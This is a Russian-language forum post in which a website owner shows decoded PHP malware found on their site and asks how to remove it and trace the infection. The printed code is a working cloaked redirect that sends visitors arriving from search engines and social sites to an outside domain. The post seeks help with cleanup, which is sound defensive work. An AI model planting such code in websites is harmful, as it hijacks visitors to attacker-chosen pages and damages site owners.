Дешифровал код вируса
Код: |
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta")
or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/
",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://lpistw.4pu.com/");
exit();
}
}
}
}
}
|
всёравно не понимаю, что он делает, и как лечить, базу PHP MyAdminом просмотрел, подозрительного ничего не нашёл... Все ненужные модули удалены, остались наиболее важные.
Upd. смысл то понятен... ( если переходить с указанных выше поисковиков) на сайт- попадёшь на
lpistw.4pu.com , вместо целевого
НО
1)
http://www.suzdalini.ru/kak-udalit-virus-s-sajta.html - прочитано, как и похожие статьи...
2)Удалять постоянно вредоносный код с сайта - это страшное не комильфо, возникает вопрос, поможет ли "775" выставленное..
3)Немогу найти причину заражения , т.к не знаю где.. в базе нет ничего подозрительного.